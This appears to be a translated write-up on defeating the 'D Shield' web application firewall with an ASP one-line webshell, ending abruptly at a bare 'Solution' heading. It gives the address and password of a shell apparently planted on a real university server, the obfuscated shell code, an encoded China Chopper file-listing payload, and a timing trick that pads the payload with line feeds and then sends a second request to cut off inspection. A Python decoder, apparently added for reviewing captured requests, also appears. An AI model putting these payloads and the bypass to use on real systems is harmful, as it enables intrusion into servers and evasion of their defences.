D Shield bypass: a wonderful line of dynamic code
D Shield blocked the execution of the dynamic script passed in as input, but it can be bypassed in a strange way.
One-line webshell address: http://sjxy.ycu.jx.cn/upfiles/Media/d2.asp, password: z. A normal kitchen knife (China Chopper) connection is dropped.
The code is as follows:
<%
Function decode(ByVal s, ByVal key)
    For i = 1 To Len(s) Step 2
        c = Mid(s, i, 2)
        k = (i + 1) / 2 Mod Len(key) + 1
        p = Mid(key, k, 1)
        If IsNumeric(Mid(s, i, 1)) Then
            decode = decode & Chr(("&H" & c) - p)
        Else
            decode = decode & Chr("&H" & c & Mid(s, i + 2, 2))
            i = i + 2
        End If
    Next
End Function
Execute decode("4A7A6C6C7A766C3169676A7869672F7B6A737C6E78762F2B7F2430357767787E6A757B31276D6C82272B3032","9527")
%>
That is, the input parameter z is decoded by the decode function and then executed.
Encode Response.Write(2333333+1) and run it; the encoded code is 526573706F6E73652E577269746528323333333333332B3129.
However, when we encoded the kitchen knife's data packet, the code was intercepted relentlessly:
Code before encoding:
Response.Write("->|"):Dim RR:RR=decode(Request("k1"),Request("key")):Function FD(dt):FD=Year(dt)&"-":If Len(Month(dt))=1 Then:FD = FD&"0":End If:FD=FD&Month(dt)&"-":If Len(Day(dt))=1 Then:FD=FD&"0":End If:FD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":":If Len(Second(dt))=1 Then:FD=FD&"0":End If:FD=FD&Second(dt):End Function:SET C=CreateObject("Scripting.FileSystemObject"):Set FO=C.GetFolder(""&RR&""):If Err Then:Response.Write("ERROR:// "&Err.Description):Err.Clear:Else:For Each F in FO.subfolders:Response.Write F.Name:Next:For Each L in FO.files:Response.Write L.Name:Next:End If:Response.Write("|<-"):Response.End
After encoding:
526573706F6E73652E577269746528222D3E7C22293A44696D2052523A52523D6465636F6465285265717565737428226B3122292C5265717565737428226B65792229293A46756E6374696F6E204644286474293A46443D596561722864742926222D223A4966204C656E284D6F6E746828647429293D31205468656E3A4644203D204644262230223A456E642049663A46443D4644264D6F6E74682864742926222D223A4966204C656E2844617928647429293D31205468656E3A46443D4644262230223A456E642049663A46443D464426446179286474292622202226466F726D61744461746554696D652864742C342926223A223A4966204C656E285365636F6E6428647429293D31205468656E3A46443D4644262230223A456E642049663A46443D4644265365636F6E64286474293A456E642046756E6374696F6E3A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A53657420464F3D432E476574466F6C646572282222265252262222293A496620457272205468656E3A526573706F6E73652E577269746528224552524F523A2F2F2022264572722E4465736372697074696F6E293A4572722E436C6561723A456C73653A466F722045616368204620696E20464F2E737562666F6C646572733A526573706F6E73652E577269746520462E4E616D653A4E6578743A466F722045616368204C20696E20464F2E66696C65733A526573706F6E73652E5772697465204C2E4E616D653A4E6578743A456E642049663A526573706F6E73652E577269746528227C3C2D22293A526573706F6E73652E456E64
There are no keywords in the data packet, so D Shield is obviously not intercepting during transmission. D Shield can detect calls to certain sensitive methods, such as FSO, while the code is being decoded and executed.
However, when I do not execute the code dynamically but write it into the server's web directory, the result is obtained successfully.
After going through the whole process, we can conclude that D Shield checks the final content of the dynamic code (no matter how the user "encrypts" it). We can also conclude that such detection consumes a certain amount of system resources. So how can resource consumption be minimized? The final test showed that D Shield detects every request from the user, but when it starts detecting a subsequent request it terminates the check on all previous requests.
Therefore, a bypass solution was born. We construct the first request package with enough dynamic code that detection takes some time. While the dynamic code of the first request is still being checked, we send the second request (a GET of the page URL containing no dynamic code); the check on the first request is then terminated before it completes. (Note: I add a lot of 0A [line feed] bytes before the dynamic code to consume detection time.)
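To see what a post-decode check like the one just described actually gets to look at, here is an added Python port of the decode() function from the shell above (example code for reviewing captured requests, not code from the post), plus a small helper that reports how much leading whitespace precedes the decoded code and which sensitive names it contains. It assumes the key consists of decimal digits (the post uses 9527 and 00000) and that the double-byte branch uses the GBK code page.

```python
"""Decoder for the key-shifted hex format used by the d2.asp one-liner above.

Mirrors the VBScript decode(): each hex byte is shifted down by one digit of
the key; a pair whose first hex digit is not 0-9 is read together with the
following pair as one double-byte (DBCS) character.
Assumptions: the key is decimal digits only, and the double-byte branch is
interpreted as GBK (the code page of a Chinese-locale server).
"""

# Illustrative list of names a post-decode check would look for.
SENSITIVE = ("Scripting.FileSystemObject", "CreateObject", "Execute", "Eval")


def d_decode(s: str, key: str, codepage: str = "gbk") -> str:
    """Port of the ASP decode(s, key); indices kept 1-based to match it."""
    if not key.isdigit():
        raise ValueError("key must be decimal digits, as the ASP code assumes")
    out = []
    i = 1
    while i <= len(s):
        c = s[i - 1:i + 1]                      # Mid(s, i, 2)
        k = ((i + 1) // 2) % len(key) + 1       # (i + 1) / 2 Mod Len(key) + 1
        p = int(key[k - 1])                     # Mid(key, k, 1)
        if s[i - 1].isdigit():                  # IsNumeric(Mid(s, i, 1))
            out.append(chr(int(c, 16) - p))     # Chr(("&H" & c) - p)
        else:                                   # Chr("&H" & c & Mid(s, i + 2, 2))
            out.append(bytes.fromhex(c + s[i + 1:i + 3]).decode(codepage))
            i += 2
        i += 2
    return "".join(out)


def inspect(z_hex: str, key: str) -> dict:
    """Decode a captured z= parameter and report what a post-decode check sees."""
    code = d_decode(z_hex, key)
    stripped = code.lstrip("\r\n \t")
    return {
        "code": code,
        "padding": len(code) - len(stripped),   # leading whitespace before the real code
        "hits": [m for m in SENSITIVE if m in code],
    }


# Inputs taken from the post: the shell's own body (key 9527) and the test probe (key 00000).
SHELL_HEX = "4A7A6C6C7A766C3169676A7869672F7B6A737C6E78762F2B7F2430357767787E6A757B31276D6C82272B3032"
PROBE_HEX = "526573706F6E73652E577269746528323333333333332B3129"

if __name__ == "__main__":
    print(inspect(SHELL_HEX, "9527"))
    print(inspect("0A0A0A" + PROBE_HEX, "00000"))   # constructed: three line feeds prepended
```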
First request:
http://sjxy.ycu.jx.cn/upfiles/Media/d2.asp
POST
z=0A0A...[many 0A0A omitted]...[value]&key=00000&k1=[value]
Second request: a direct GET request to http://sjxy.ycu.jx.cn/upfiles/Media/d2.asp
A direct POST is intercepted:
With the method above, the dynamic code is executed successfully:
Solution:
Logic